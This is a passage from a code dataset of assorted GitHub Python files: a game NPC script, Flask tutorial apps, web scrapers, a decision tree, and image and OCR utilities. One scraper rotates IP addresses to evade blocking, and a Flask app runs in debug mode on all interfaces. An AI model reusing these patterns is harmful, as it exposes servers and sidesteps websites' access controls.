num)\nmonDisplay = \"\"\ncont = 0\nmesos2 = mesos\nwhile mesos2 > 0:\n cont +=1\n monDisplay = str(mesos2 % 10) + str(monDisplay)\n\n if cont == 3:\n if (mesos2 / 10) > 0:\n monDisplay = \",\" + str(monDisplay)\n cont = 0\n\n mesos2 = (mesos2 / 10)\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n# display the amount of meso you must pay in pretty way -\n#mesoDisplay = str(mesos/1000000) + \",000,000\"\n\nresponse = sm.sendAskYesNo(\"it's cost #r\" + monDisplay + \"#k mesos if you want to change\\r\\nYou have #b\" + str(chrDisplay) + \"#k\")\nif response:\n if sm.getMesos() > mesos:\n sm.deductMesos(mesos)\n al.setFace(options[answer])\n sm.changeCharacterLook(options[answer])\n sm.sendSayOkay(\"Enjoy the new look:D\")\n else:\n sm.sendSayOkay(\"you don't have enough meso, sorry\")\nelse:\n sm.sendSayOkay(\"you cheap Fuck!\")\n","repo_name":"doriyan13/doristory","sub_path":"scripts/npc/hair_henesys2.py","file_name":"hair_henesys2.py","file_ext":"py","file_size_in_byte":3482,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"30064963137","text":"\"\"\"\r\n\n\n **Mubashir** has started his journey from home. Given a string of\n`directions` (N=North, W=West, S=South, E=East), he will walk for one minute\nin each direction. Determine whether a set of directions will lead him back to\nthe starting position or not.\n\n### Examples\n\n back_to_home(\"EEWE\") ➞ False\n \n back_to_home(\"NENESSWW\") ➞ True\n \n back_to_home(\"NEESSW\") ➞ False\n\n### Notes\n\nN/A\n\n\"\"\"\r\n\ndef back_to_home(directions):\n countN = 0\n countS = 0\n countE = 0\n countW = 0\n for let in directions:\n if let == 'N':\n countN = countN + 1\n if let == 'S':\n countS = countS + 1\n if let == 'E':\n countE = countE + 1 \n if let == 'W':\n countW = countW + 1\n if countN == countS and countE == countW:\n return True\n else:\n return False\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"F3M4PhqC4JdX28Qmx_4.py","file_name":"F3M4PhqC4JdX28Qmx_4.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"73429017371","text":"import sys\nimport requests\nfrom xml.etree import ElementTree\n\nimport cognitiveToken\n\ndef translate(**kwargs):\n try: #make sure we have the 'text' and 'to'\n text = kwargs[\"text\"]\n to = kwargs[\"to\"]\n except: #otherwise throw an error and exit without calling the API\n sys.stderr.write(\"Must provide 'text' and 'to' as kwargs\\n\")\n return 1\n\n url = \"https://api.microsofttranslator.com/v2/http.svc/Translate\"\n\n values = {\n \"appid\": \"Bearer \" + cognitiveToken.getToken(), #need to get a token, these expire every 10 minutes\n \"text\": text,\n \"to\": to\n }\n\n r = requests.get(url, params=values)\n output = ElementTree.fromstring(r.text.encode('utf-8')) #convert xml response to text\n \n return output.text","repo_name":"chris-geelhoed/TranslateComparison","sub_path":"microsoftTrans.py","file_name":"microsoftTrans.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"9934773249","text":"import os\nimport json\nfrom flask import Flask, render_template, request, flash\nif os.path.exists(\"env.py\"):\n import env\n\"\"\" render_template: Alternative zu direktem HTML\nhier wird das Tepmlate in HTML gerändert \"\"\"\n\"\"\" request: Request is going to handle things like finding out what method\nwe used, and it will also\ncontain our form object when we've posted it. \"\"\"\n\"\"\" flash: display some feedback to the user. wie allert\nDafür brauchen wir a secret key, because Flask cryptographically\nsigns all of the messages for security purposes.\njetzt kann Flask use the key to sign the messages. in env.py\"\"\"\n\"\"\" env wird nur importiert, wenn das system os eine env datai findet\ndadurch wird pycach kreiert > in ignore \"\"\"\n\n\napp = Flask(__name__)\napp.secret_key = os.environ.get(\"SECRET_KEY\")\n\"\"\" um den secret key aus env zu nutzen \"\"\"\n\n\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\")\n \"\"\" die render_temp funktion ruft index.html auf.\n der file ist im ordner templates \"\"\"\n\n\n@app.route(\"/about\")\ndef about():\n data = []\n with open('data/company.json', 'r') as json_data:\n \"\"\" python soll die daten aus json importieren\n der file ist in directory \"\"\"\n data = json.load(json_data)\n \"\"\" set our empty 'data' list to equal the parsed JSON data \"\"\"\n return render_template(\"about.html\", page_title=\"About\", company=data)\n\n\n\"\"\"The angle brackets pass in data from the URL path, into view below\nwenn auf der aubut seite auf einen link geklickt wird, wird member_name\nhier eingefügt\"\"\"\n\n\n@app.route(\"/about/\")\ndef about_member(member_name):\n member = {}\n with open('data/company.json', 'r') as json_data:\n data = json.load(json_data)\n for obj in data:\n if obj['url'] == member_name:\n member = obj\n return render_template(\"member.html\", member=member)\n\n\n@app.route(\"/contact\", methods=[\"GET\", \"POST\"])\ndef contact():\n if request.method == \"POST\":\n flash(\"Thanks {}, we have received your message!\".format(\n request.form.get(\"name\")))\n \"\"\" print(request.form.get('name'))\n print(request.form['email']) \"\"\"\n \"\"\"if there isn't a 'name' or 'email' key on our\n form, instead of returning 'None', it would throw an exception.\n That's how we can access a form's data from the backend of our site.\"\"\"\n return render_template(\"contact.html\", page_title=\"Contact\")\n\n\n@app.route(\"/careers\")\ndef careers():\n return render_template(\"careers.html\", page_title=\"Careers\")\n\n\nif __name__ == \"__main__\":\n app.run(\n host=os.environ.get(\"IP\", \"0.0.0.0\"),\n port=int(os.environ.get(\"PORT\", \"5000\")),\n debug=True)\n","repo_name":"danio86/EXPLORER-THORN","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34676785215","text":"import os\nimport random\n\n# Hashes can be found here https://wiki.rage.mp/index.php?title=Peds\nwith open(os.path.normpath(\"utils/pedsToHashes.txt\"), \"r\") as file:\n pedsToHashes_ls = file.read()\n\npedsToHashes_ls = pedsToHashes_ls.split(\"\\n\")\npedsToHashes_ls = [d.split(\"=\") for d in pedsToHashes_ls]\n\npedsToHashes = {n: h.lower() for n, h in pedsToHashes_ls}\nhashesToPeds = {h.lower(): n for n, h in pedsToHashes_ls}\n\n\n# def checkValidHex(v):\n# try:\n# int(v, 16)\n# except ValueError:\n# return False\n# return True\n\n# invalid = {k:v for k,v in pedsToHashes.items() if not checkValidHex(v)}\n\n# spawnablePeds_ls = [n for n, h in pedsToHashes.items() if n[-2:] != \"_p\" and not \"*\" in h]\nspawnablePeds_ls = [k for k in pedsToHashes.keys()]\n\ndef convertHashToModelName(hash):\n if isinstance(hash, str):\n if hash[:2] != \"0x\":\n hash = \"0x\" + hash\n hash = hash.lower()\n elif isinstance(hash, int):\n hash = \"{0:#0{1}x}\".format(hash,10)\n else:\n raise ValueError(\"hash has to be given in type str or int\")\n \n try:\n modelName = hashesToPeds[hash]\n except KeyError:\n modelName = \"UNKNOWN\"\n return modelName\n\ndef convertModelNameToHash(modelName):\n return pedsToHashes[modelName][2:]\n\ndef getRandomPed():\n return random.sample(spawnablePeds_ls, 1)[0]\n\n\n\n","repo_name":"David0tt/DeepGTAV","sub_path":"VPilot/utils/PedNamesAndHashes.py","file_name":"PedNamesAndHashes.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"32"} +{"seq_id":"8546786957","text":"import pandas\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nfrom sklearn import model_selection\r\nfrom sklearn.metrics import accuracy_score\r\n\r\n#Tree Node\r\nclass Node:\r\n def __init__(self, predicted_class):\r\n self.predicted_class = predicted_class\r\n self.feature_index = 0\r\n self.threshold = 0\r\n self.left = None\r\n self.right = None\r\n\r\n#Model\r\nclass DecisionTree:\r\n def __init__(self, max_depth=10):\r\n self.max_depth = max_depth\r\n \r\n #Fit method makes the tree\r\n def fit(self, X, y):\r\n self.n_classes_ = len(set(y))\r\n self.n_features_ = X.shape[1]\r\n self.tree_ = self._grow_tree(X, y)\r\n \r\n #Called by the fit method, recursive function\r\n def _grow_tree(self, X, y, depth=0):\r\n num_samples_per_class = [np.sum(y == i) for i in range(self.n_classes_)]\r\n predicted_class = np.argmax(num_samples_per_class)\r\n node = Node(predicted_class=predicted_class)\r\n if depth < self.max_depth:\r\n idx, thr = self._best_split(X, y)\r\n if idx is not None:\r\n indices_left = X[:, idx] < thr\r\n X_left, y_left = X[indices_left], y[indices_left]\r\n X_right, y_right = X[~indices_left], y[~indices_left]\r\n node.feature_index = idx\r\n node.threshold = thr\r\n node.left = self._grow_tree(X_left, y_left, depth + 1)\r\n node.right = self._grow_tree(X_right, y_right, depth + 1)\r\n return node\r\n \r\n #Called by the grow tree, finds best split feature and threshold\r\n def _best_split(self, X, y):\r\n m = y.size\r\n if m <= 1:\r\n return None, None\r\n num_parent = [np.sum(y == c) for c in range(self.n_classes_)]\r\n best_gini = 1.0 - sum((n / m) ** 2 for n in num_parent)\r\n best_idx, best_thr = None, None\r\n for idx in range(self.n_features_):\r\n thresholds, classes = zip(*sorted(zip(X[:, idx], y)))\r\n num_left = [0] * self.n_classes_\r\n num_right = num_parent.copy()\r\n for i in range(1, m):\r\n c = classes[i - 1]\r\n num_left[c] += 1\r\n num_right[c] -= 1\r\n gini_left = 1.0 - sum(\r\n (num_left[x] / i) ** 2 for x in range(self.n_classes_)\r\n )\r\n gini_right = 1.0 - sum(\r\n (num_right[x] / (m - i)) ** 2 for x in range(self.n_classes_)\r\n )\r\n gini = (i * gini_left + (m - i) * gini_right) / m\r\n if thresholds[i] == thresholds[i - 1]:\r\n continue\r\n if gini < best_gini:\r\n best_gini = gini\r\n best_idx = idx\r\n best_thr = (thresholds[i] + thresholds[i - 1]) / 2\r\n return best_idx, best_thr\r\n\r\n #Predict\r\n def predict(self, X):\r\n return [self._predict(inputs) for inputs in X]\r\n \r\n #Helper for predict\r\n def _predict(self, inputs):\r\n node = self.tree_\r\n while node.left:\r\n if inputs[node.feature_index] < node.threshold:\r\n node = node.left\r\n else:\r\n node = node.right\r\n return node.predicted_class\r\n\r\nif __name__==\"__main__\":\r\n #Load iris data and split\r\n iris = pandas.read_csv(\"Data/iris.csv\") \r\n iris=iris.drop(\"species\", axis=1).to_numpy()\r\n iris_L = [0]*50+[1]*50+[2]*50\r\n X_train,X_test,y_train,y_test=model_selection.train_test_split(iris,iris_L,test_size=0.1)\r\n\r\n #Test classification model and compare it with sklearn's model\r\n d_values = list(range(1,10))\r\n accModel1= []\r\n accModel2= []\r\n\r\n for d in d_values:\r\n model1 = DecisionTree(d)\r\n model1.fit(X_train, np.array(y_train))\r\n y_pred = model1.predict(X_test)\r\n accModel1.append(round(accuracy_score(y_test,y_pred)*100,2))\r\n\r\n for d in d_values:\r\n model2 = DecisionTreeClassifier(max_depth=d, criterion=\"gini\")\r\n model2.fit(X_train, y_train)\r\n y_pred = model2.predict(X_test)\r\n accModel2.append(round(accuracy_score(y_test,y_pred)*100,2))\r\n\r\n print(\"Our Accuracies: \", accModel1)\r\n print(\"Sklearn's Accuracies: \", accModel2)\r\n plt.scatter(accModel1, accModel2)\r\n plt.title(\"Decision Tree Accuracy comparison\")\r\n plt.xlabel(\"Accuracy of our DT\")\r\n plt.ylabel(\"Accuracy of sklearn's DT\")\r\n plt.show()\r\n","repo_name":"abhibhargav29/MLearns","sub_path":"5)DecisionTree.py","file_name":"5)DecisionTree.py","file_ext":"py","file_size_in_byte":4495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"84141284","text":"import numpy as np\nimport json\nfrom PIL import Image\nfrom pathlib import Path\nimport argparse\nimport os\n\ndef crop_images_bbox(input_dir,output_dir,anno_path, double_path = False):\n with open(anno_path) as f:\n anno = json.load(f)\n\n imageid2filename = {}\n for item in anno['images']:\n imageid2filename[item['id']] = item['file_name']\n\n label2conceptname = {}\n for item in anno['categories']:\n name = item['name'].replace(' ','_')\n label2conceptname[item['id']] = name\n if double_path == True:\n (output_dir/name/name).mkdir(parents=True, exist_ok = True)\n else:\n (output_dir/name).mkdir(parents=True, exist_ok = True)\n\n for item in anno['annotations']:\n bbox = item['bbox']\n if bbox[2] < 30 or bbox[3] < 30:\n continue\n bbox[2] += bbox[0]\n bbox[3] += bbox[1]\n img = Image.open(input_dir / imageid2filename[item['image_id']])\n img_cropped = img.crop(bbox)\n concept_name = label2conceptname[item['category_id']]\n if double_path == True:\n img_cropped.save(output_dir / f\"{concept_name}/{concept_name}/{item['id']}.jpg\")\n else:\n img_cropped.save(output_dir / f\"{concept_name}/{item['id']}.jpg\")\n \n return\n\nparser = argparse.ArgumentParser('Cropping COCO images with bounding boxs')\nparser.add_argument('-coco-path', type=str, default = 'data/coco')\nparser.add_argument('-concept-path', type=str, default = 'data_256')\nargs = parser.parse_args()\nprint(args)\n\ncoco_path = Path(args.coco_path)\ntrain_dir = coco_path / 'train2017'\nval_dir = coco_path / 'val2017'\ntrain_anno_path = coco_path / 'annotations/instances_train2017.json'\nval_anno_path = coco_path / 'annotations/instances_val2017.json'\n\nconcept_path = Path(args.concept_path)\nconcept_path.mkdir(parents=True, exist_ok = True)\nconcept_train_dir = concept_path / 'concept_train'\nconcept_train_dir.mkdir(parents=True, exist_ok = True)\nconcept_val_dir = concept_path / 'concept_test'\nconcept_val_dir.mkdir(parents=True, exist_ok = True)\n\ncrop_images_bbox(val_dir, concept_val_dir, val_anno_path)\ncrop_images_bbox(train_dir, concept_train_dir, train_anno_path, double_path=True)\n\n","repo_name":"zhiCHEN96/ConceptWhitening","sub_path":"cropping_images_COCO.py","file_name":"cropping_images_COCO.py","file_ext":"py","file_size_in_byte":2210,"program_lang":"python","lang":"en","doc_type":"code","stars":106,"dataset":"github-code","pt":"32"} +{"seq_id":"1812097668","text":"from django.forms.widgets import Widget\nfrom django.template import loader\nfrom django.utils.safestring import mark_safe\nfrom django.urls import reverse\nimport os\nfrom django.conf import settings\nfrom ocr import settings as ocr_default_settings\n\n\nclass LinkWidget(Widget):\n \"\"\"\n Base class for FileLink and PdfLink 2019-04-12\n \"\"\"\n template_name = None\n\n def __init__(self, *args, **kwargs):\n \"\"\"\n LinkWidget constructor, 2019-04-12\n :param args:\n :param kwargs:\n \"\"\"\n super(LinkWidget, self).__init__(*args, **kwargs)\n\n\nclass FileLink(LinkWidget):\n \"\"\"\n Widget of OCRedFile.file for using in admin 2019-04-12\n \"\"\"\n template_name = 'ocr/forms/widgets/file_link.html'\n file_type = None\n\n def __init__(self, *args, **kwargs):\n \"\"\"\n FileLink widget constructor, initializes self.file_type, 2019-04-12\n :param args:\n :param kwargs:\n \"\"\"\n if 'file_type' in kwargs:\n self.file_type = kwargs['file_type']\n kwargs.pop('file_type')\n super(FileLink, self).__init__(*args, **kwargs)\n\n def get_context(self, name, value, attrs):\n context = super(FileLink, self).get_context(name, value, attrs)\n if getattr(settings, 'OCR_FILE_PREVIEW', ocr_default_settings.FILE_PREVIEW) and 'image' in self.file_type:\n context['widget']['file_preview'] = True\n if not getattr(settings, 'OCR_STORE_FILES', ocr_default_settings.STORE_FILES):\n context['widget']['store_files_disabled'] = True\n if 'store_files_disabled' in context['widget']['value']:\n context['widget']['file_missing'] = True\n elif 'file_removed' in context['widget']['value']:\n context['widget']['file_removed'] = True\n else:\n context['widget']['filename'] = os.path.basename(str(value))\n context['widget']['url'] = reverse(__package__ + ':download',\n kwargs={'download_target': 'file', 'filename': context['widget']['filename']})\n return context\n\n\nclass PdfLink(LinkWidget):\n \"\"\"\n Widget that shows a link to pdf file on the update model admin page.\n If pdf file exists the 'Remove PDF' button shows.\n If pdf file does not exists and it is possible to create it the 'Create PDF' button will shows\n \"\"\"\n template_name = 'ocr/forms/widgets/pdf_link.html'\n can_create_pdf = None\n # no_source_file = False\n # ocred = False\n\n def __init__(self, *args, **kwargs):\n if 'can_create_pdf' in kwargs:\n self.can_create_pdf = kwargs['can_create_pdf']\n kwargs.pop('can_create_pdf')\n super(PdfLink, self).__init__(*args, **kwargs)\n\n def get_context(self, name, value, attrs):\n \"\"\"\n This function creates context for rendering widget template.\n If pdf file exists the context['pdf_exists'] will be True\n If pdf file does not exist and it is possible to create it context['create_pdf_button'] will be True\n :param name:\n :param value:\n :param attrs:\n :return:\n \"\"\"\n context = super(PdfLink, self).get_context(name, value, attrs)\n\n if not getattr(settings, 'OCR_STORE_PDF', ocr_default_settings.STORE_PDF):\n context['widget']['store_pdf_disabled'] = True\n if not context['widget']['value']:\n # value is empty, this means that OCRedFile.file is PDF and it has text,\n # or OCRedFile.file was ocred but OCRedFile.text is empty\n # In this case no need to show Remove button, and no need to show Create button\n return context\n if self.can_create_pdf:\n context['widget']['create_pdf_button'] = True\n if 'store_pdf_disabled' in context['widget']['value']:\n context['widget']['pdf_missing'] = True\n elif 'pdf_removed' in context['widget']['value']:\n context['widget']['pdf_removed'] = True\n else:\n context['widget']['filename'] = os.path.basename(str(value))\n context['widget']['url'] = reverse(__package__ + ':download',\n kwargs={'download_target': 'pdf', 'filename': context['widget']['filename']})\n context['widget']['pdf_exists'] = True\n return context\n\n\nclass PdfInfo(Widget):\n template_name = 'ocr/forms/widgets/pdf_info.html'\n pdf_info = None\n\n def __init__(self, *args, **kwargs):\n if 'pdf_info' in kwargs:\n self.pdf_info = kwargs['pdf_info']\n kwargs.pop('pdf_info')\n super(PdfInfo, self).__init__(*args, **kwargs)\n\n def get_context(self, name, value, attrs):\n context = super(PdfInfo, self).get_context(name, value, attrs)\n context['pdf_info'] = self.pdf_info\n return context\n","repo_name":"shmakovpn/ocr_server","sub_path":"ocr/widgets.py","file_name":"widgets.py","file_ext":"py","file_size_in_byte":4836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20535051897","text":"# -*- coding: utf-8 -*-\n\nimport re\nimport os\nfrom urllib import quote\nfrom scrapy.spider import BaseSpider\ntry:\n from scrapy.selector import Selector\nexcept ImportError:\n from scrapy.selector import HtmlXPathSelector as Selector\n\nfrom scrapy.http import Request, FormRequest\nfrom scrapy.utils.url import urljoin_rfc\n\nfrom scrapy.item import Item, Field\nfrom product_spiders.utils import extract_price\nfrom product_spiders.items import (\n Product,\n ProductLoaderWithNameStrip as ProductLoader\n)\n\n\nHERE = os.path.abspath(os.path.dirname(__file__))\n\n\nclass MetaData(Item):\n Promotions = Field()\n corner_promotion = Field()\n\n\nclass BathEmpireSpider(BaseSpider):\n name = \"bathempire-bathempire.com\"\n allowed_domains = [\"soak.com\", \"fsm.attraqt.com\"]\n start_urls = ['http://www.soak.com/']\n\n def parse(self, response):\n categories = response.xpath('//div[@id=\"header\"]//a/@href').extract()\n categories += response.xpath('//div[@class=\"categorypage\"]//div/a/@href').extract()\n for url in categories:\n yield Request(response.urljoin(url))\n\n category_tree = re.findall(\"'categorytree', '(.*)'\\);\", response.body)\n category_conf = re.findall(\"'category', '(.*)'\\);\", response.body)\n\n if category_conf and category_tree:\n category_tree = category_tree[0]\n category_conf = category_conf[0]\n \n products_page = ('http://fsm.attraqt.com/zones-js.aspx?version=2.23.2&'\n 'siteId=4170eb3b-f55c-40d3-aaeb-8cb777e96a28&referrer=&'\n 'sitereferrer=&pageurl='+quote(response.url)+'&esp_pg=1&zone0=category_recs1&'\n 'zone1=category&zone2=banner_advert&zone3=category_recs2&'\n 'zone4=category_recs3&facetmode=data&mergehash=true&'\n 'config_categorytree='+category_tree+'&config_category='+category_conf)\n meta={'category_tree': category_tree, \n 'category_conf': category_conf,\n 'url': response.url}\n yield Request(products_page, callback=self.parse_products, meta=meta)\n\n def parse_products(self, response):\n base_url = 'http://soak.com'\n\n hxs = Selector(text=response.body.replace('\\\\\"', '\"'))\n \n products = hxs.select('//div[contains(@class, \"product\")]//a[div[@class=\"name\"]]/@href').extract()\n for product in products:\n yield Request(urljoin_rfc(base_url, product), callback=self.parse_product)\n\n pages = hxs.select('//a[contains(@class, \"pageNumber\")]/text()').extract()\n for page in pages:\n next_page = ('http://fsm.attraqt.com/zones-js.aspx?version=2.23.2&'\n 'siteId=4170eb3b-f55c-40d3-aaeb-8cb777e96a28&referrer=&'\n 'sitereferrer=&pageurl='+response.meta['url']+'%23esp_pg%3D'+page+'&zone0=category_recs1&'\n 'zone1=category&zone2=banner_advert&zone3=category_recs2&'\n 'zone4=category_recs3&facetmode=data&mergehash=true&'\n 'config_categorytree='+response.meta['category_tree']+'&config_category='+response.meta['category_conf'])\n yield Request(next_page, callback=self.parse_products, meta=response.meta)\n\n def parse_product(self, response):\n products = response.xpath('//div[contains(@class, \"product\")]//a[div[@class=\"name\"]]/@href').extract()\n if products:\n for product in products:\n yield Request(response.urljoin(product), callback=self.parse_product)\n\n pages = response.xpath('//a[contains(@class, \"pageNumber\")]/text()').extract()\n for page in pages:\n page = response.urljoin(page)\n yield Request(page)\n\n return\n\n name = response.xpath('//div/h1/text()').extract()\n try:\n price = response.xpath('//div[@class=\"bigprice GBP\"]/@data-price').extract()[0]\n except IndexError:\n for p in self.parse(response):\n yield p\n return\n\n brand = ''\n categories = response.xpath('//ul[@class=\"breadcrumb\"]/li/a/text()').extract()[1:]\n\n l = ProductLoader(item=Product(), response=response)\n\n image_url = response.xpath('//div[@id=\"mainImage\"]/img/@src').extract()\n image_url = response.urljoin(image_url[0]) if image_url else ''\n l.add_value('image_url', image_url)\n l.add_value('url', response.url)\n l.add_value('name', name)\n l.add_value('price', extract_price(price))\n l.add_value('brand', brand)\n l.add_value('category', categories)\n sku = response.xpath('//p[@class=\"partcode\"]/text()').re('Quick Code: (.*)')\n sku = sku[0] if sku else ''\n l.add_value('sku', sku)\n l.add_xpath('identifier', '//input[@name=\"product_id\"]/@value')\n\n item = l.load_item()\n\n promotions = response.xpath('//div[contains(@class, \"price_box\")]//div[@class=\"GBP\"]/span[@class=\"desktop_rrp\" or @class=\"saving\"]/text()').extract()\n\n corner_promotion = response.xpath('//img[@class=\"cornerflash\"]/@src').re('Empire/(.*).png')\n corner_promotion = corner_promotion[0] if corner_promotion else ''\n\n corner_promotions = {'pricedrop': 'Price Drop',\n 'deal': 'Deal',\n 'freedel': 'Free Delivery',\n 'newarrival': 'New Arrival',\n 'sale': 'Sale',\n 'bestseller': 'Bestseller',\n 'wasteincluded': 'Waste Included',\n 'trayincluded': 'Tray Included',\n 'clearance': 'Clearance',\n 'pricedropred': 'Price Drop',\n 'asseenontv': 'As Seen On T.V'}\n\n metadata = MetaData()\n metadata['corner_promotion'] = corner_promotions.get(corner_promotion, '')\n metadata['Promotions'] = ' '.join(promotions) if promotions else ''\n item['metadata'] = metadata\n\n stock_url = \"http://soak.com/includes/ajax/in_stock.php\"\n part_code = response.xpath('//div[contains(@class, \"stock_report\")]/@data-partcode').extract()[0]\n manufacturers_id = response.xpath('//div[contains(@class, \"stock_report\")]/@data-manufacturers_id').extract()[0]\n formdata = {'action': 'in_stock',\n 'manufacturers_id': manufacturers_id,\n 'part_code': part_code}\n\n yield FormRequest(stock_url, formdata=formdata, callback=self.parse_stock, meta={'item': item})\n\n def parse_stock(self, response):\n item = response.meta['item']\n stock = response.xpath('//*[contains(text(), \"In stock\")]').extract()\n if not stock:\n item['stock'] = 0\n\n shipping_url = \"http://soak.com/product.php?action=ShippingQuote\"\n formdata = {'productID': item['identifier']}\n req = FormRequest(shipping_url, formdata=formdata, callback=self.parse_shipping_cost, meta={'item': item})\n yield req\n\n def parse_shipping_cost(self, response):\n item = response.meta['item']\n\n shipping_cost = response.xpath('//span[@class=\"GBP currency2\"]/text()').extract()\n if shipping_cost:\n item['shipping_cost'] = extract_price(shipping_cost[0])\n\n yield item\n\n","repo_name":"Godsoo/scraping","sub_path":"e-commerce/CompetitorMonitor/product_spiders/spiders/bathempire/bathempire.py","file_name":"bathempire.py","file_ext":"py","file_size_in_byte":7410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25228262433","text":"import datetime\nimport logging\nimport random\nimport threading\nimport time\nimport traceback\nfrom multiprocessing import Process\nimport schedule\nfrom read_company_base import get_company_base_cert_readfile\nfrom spider.redis_company import company_four, company_four_over\nfrom spider.sikuyipingminspider import MinSpider, wirte_file\nfrom spider.sql import searchdb, serch_siku_id\n\n\ndef get_redis_company_id_base_cert():\n try:\n spider = MinSpider()\n spider.replace_ip()\n while True:\n times=str(datetime.date.today())\n fil=f'company_id{times}.txt'\n if spider.booltime(times): # is true wating 1h\n print('waiting1h......')\n wirte_file(fil,data=1)\n get_company_base_cert_readfile()\n companys = set()\n for n in range(10):\n cname=company_four()\n # psnum = searchdb(cname)\n # print(cname, psnum)\n # if not psnum:\n companys.add(cname)\n print(companys)\n # time.sleep(2222)\n threads_name_id = []#遍历获取 name id\n for companyname in companys:\n print(companyname)\n threadid = threading.Thread(target=spider.get_company_id, args=(companyname, fil))\n threadid.start()\n threads_name_id.append(threadid)\n for thread in threads_name_id:\n thread.join()\n threads_base_cert = []#遍历获取 base cert\n for base in spider.companyset:\n companybase=eval(base.replace('\\n', ''))\n print(companybase)\n cname = companybase[0]\n if not searchdb(cname):\n cid = companybase[1]\n scthread = threading.Thread(target=spider.run_search_base_cert, args=(cid, cname,times),)\n scthread.start()\n threads_base_cert.append(scthread)\n for thread in threads_base_cert:\n thread.join()\n for cname in companys:\n company_four_over(cname)\n spider.companyset.clear()\n spider.randomtime()\n except Exception as e:\n logging.error(f\"def get_redis_company_id_base_cert 获取失败{e}\\n{traceback.format_exc()}\")\n\ndef run2():\n process = []\n for a in range(10):\n p = Process(target=get_redis_company_id_base_cert)\n print(p.name)\n p.start()\n process.append(p)\n for pro in process:\n pro.join()\n print('采集完成')\n\n\nif __name__ == '__main__':\n\n # print('after waiting 1h ,start timer..... ')\n # schedule.every().day.at(\"01:19:00\").do(run2)\n while True:\n run2()\n # schedule.run_pending()\n # print('after waiting 1h ,start timer..... ')\n time.sleep(1000*random.random() * 500)\n","repo_name":"Uther-ivy/siku_spider","sub_path":"run_redis_siku_base.py","file_name":"run_redis_siku_base.py","file_ext":"py","file_size_in_byte":2879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1400788684","text":"from flask import Flask, render_template,request\nimport mlab\nfrom bike import Bike\n\n\n\napp = Flask(__name__)\nmlab.connect()\n@app.route(\"/new_bike\", methods = [\"GET\", \"POST\"])\ndef new_bike():\n if request.method == \"GET\":\n return render_template (\"add_bike.html\")\n else:\n form = request.form \n m = form[\"Model\"]\n d = form[\"Dailyfee\"]\n i = form[\"Image\"]\n y = form[\"Year\"]\n n = Bike(Model = m, Dailyfee = d, Image = i, Year = y)\n n.save()\n return \"Ahihi DO ngoc\", print(n)\n\nif __name__ == \"__main__\": \n app.run(debug=True)\n\n","repo_name":"Ngocdungnb/ngocdung-web","sub_path":"web3/homework/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19047497859","text":"def add_category_weights(event, context):\n\n from google.cloud import storage\n from google.cloud import firestore\n from google.cloud import pubsub_v1\n\n\n def list_categories(bucket_name, source_blob_name):\n\n storage_client = storage.Client()\n bucket = storage_client.bucket(bucket_name)\n blob = bucket.get_blob(source_blob_name)\n categories = blob.download_as_string(client=None).decode('utf-8').split(',')\n\n return categories\n\n def create_weights(list_of_categories, collection):\n\n db = firestore.Client()\n emails_list = db.collection(u'{}'.format(collection)).get()\n \n print(list_of_categories)\n other_category = 'other'\n\n dict_of_weights = {}\n for category in list_of_categories:\n dict_of_weights[category] = 0\n print(dict_of_weights)\n \n for email in emails_list:\n categories = email.get(\"categories\")\n\n for category in categories:\n dict_of_weights[category] = dict_of_weights[category] + 1\n \n print(dict_of_weights)\n \n for category in list_of_categories:\n # Add a new document\n doc_ref = db.collection(u'category_weights').document(u'{}'.format(category))\n doc_ref.set({\n u'name': u'{}'.format(category),\n u'weight': dict_of_weights[category]\n })\n\n list_of_categories = list_categories('email_staging', 'list-of-categories.txt')\n create_weights(list_of_categories, 'emails')\n\n publisher = pubsub_v1.PublisherClient()\n topic_name = 'projects/{project_id}/topics/{topic}'.format(\n project_id='hack-hackasaumon',\n topic='sentiment-trigger', # Set this to something appropriate.\n )\n future = publisher.publish(topic_name, b'Done adding weights')\n future.result()\n return f'Weights added to Firestore!'\n","repo_name":"fleadsom/dbee","sub_path":"cloud_functions/add-weights/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1909,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"37112585593","text":"# возвращает все словари в списке\r\ndef dicts_in_list(l: list):\r\n # пустой список\r\n dicts = []\r\n # перебираем всё в списке\r\n for item in l:\r\n # если это словарь, добавляем в список\r\n if isinstance(item, dict):\r\n dicts.append(item)\r\n # если это список, то рекурсия, результат соединяем со словарем\r\n elif isinstance(item, list):\r\n dicts = dicts + dicts_in_list(item)\r\n # возвращаем список словарей внутри списка\r\n return dicts\r\n\r\n\r\n# глубина словаря\r\ndef dict_len(mydict, count=0):\r\n # список глубин ветвей\r\n branches = []\r\n # каждый ключ в словаре\r\n for key in mydict:\r\n # если это словарь\r\n if isinstance(mydict[key], dict):\r\n # добавляем ветку со значением 1\r\n branches.append(1)\r\n # рекурсия\r\n count = dict_len(mydict[key], count)\r\n # добавляем значение в список\r\n branches[-1] += count\r\n # если это список\r\n elif isinstance(mydict[key], list):\r\n # перебираем словари в списке\r\n for item in dicts_in_list(mydict[key]):\r\n # каждый - новая ветвь\r\n branches.append(1)\r\n count = 